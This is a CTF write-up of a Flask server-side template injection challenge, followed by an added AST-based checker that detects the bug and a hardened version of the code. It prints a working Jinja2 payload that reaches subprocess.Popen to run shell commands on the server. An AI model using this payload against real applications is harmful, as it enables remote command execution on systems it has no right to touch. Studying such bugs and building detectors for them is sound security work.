It is so nice to hear Parrot the Emu talk back
Author: richighimi
https://web-parrot-the-emu-4c2d0c693847.2024.ductf.dev
This challenge is a server-side template injection (SSTI). The server's source code (app.py) contains the following snippet:
    if request.method == 'POST':
        user_input = request.form.get('user_input')
        try:
            # Vulnerable: the user-controlled string is used as the template source
            result = render_template_string(user_input)
        except Exception as e:
            result = str(e)
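The code passes user_input to render_template_string without applying any sanitization, so the input itself is evaluated as a Jinja2 template. This allows us to exploit the vulnerability by submitting a malicious template like the following:

    {{ ''.__class__.__mro__[1].__subclasses__()[213]('/usr/bin/cat flag', shell=True, stdout=-1).communicate() }}

This template walks from the empty string's class to the subclasses of object and instantiates the one at index 213 with a shell command (shell=True, stdout=-1 and communicate() are the arguments and method of subprocess.Popen). The rendered result prints the output of the flag file, which contains the challenge flag: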
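
A defender-side check for this bug class, as an added example that is not part of the original writeup or the challenge's code: it walks a Python file's AST and flags every render_template_string call whose template argument is not a string literal, and shows that the fixed form (constant template, user input passed only as a context variable) is not flagged. The route, function name and both sample sources are constructed for illustration.

```python
import ast

# Constructed sample modelled on the app.py snippet above
# (the route and function name are assumptions, not the challenge's code).
VULNERABLE = '''
from flask import Flask, request, render_template_string
app = Flask(__name__)

@app.route("/", methods=["GET", "POST"])
def index():
    result = ""
    if request.method == "POST":
        user_input = request.form.get("user_input")
        result = render_template_string(user_input)
    return result
'''

# Hardened form: the template is a constant and user input is only a context
# value, so Jinja2 never parses the input as template syntax.
HARDENED = VULNERABLE.replace(
    "render_template_string(user_input)",
    'render_template_string("{{ user_input }}", user_input=user_input)',
)

def find_dynamic_templates(source):
    """Return (line, expression) for each render_template_string call whose
    template is not a plain string literal (variables, f-strings, concatenation)."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
        if name != "render_template_string":
            continue
        # The template is the first positional argument or the `source` keyword.
        if node.args:
            template = node.args[0]
        else:
            template = next((k.value for k in node.keywords if k.arg == "source"), None)
        is_literal = isinstance(template, ast.Constant) and isinstance(template.value, str)
        if template is not None and not is_literal:
            findings.append((node.lineno, ast.unparse(template)))
    return findings

if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(label, find_dynamic_templates(src))
```

A finding means the template text is built at runtime and needs review; it does not by itself prove the value is attacker-controlled.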